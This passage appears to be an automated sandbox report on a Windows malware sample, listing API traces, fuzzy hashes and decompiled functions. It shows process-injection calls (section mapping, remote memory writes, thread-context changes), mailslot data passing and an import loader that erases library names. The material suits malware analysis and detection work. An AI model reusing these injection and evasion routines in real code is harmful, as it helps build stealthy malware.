    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
  • Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
  • Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
  • Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
  • SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}
APIs
  • CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}
APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
  • Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
  • Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
  • Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
  • FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
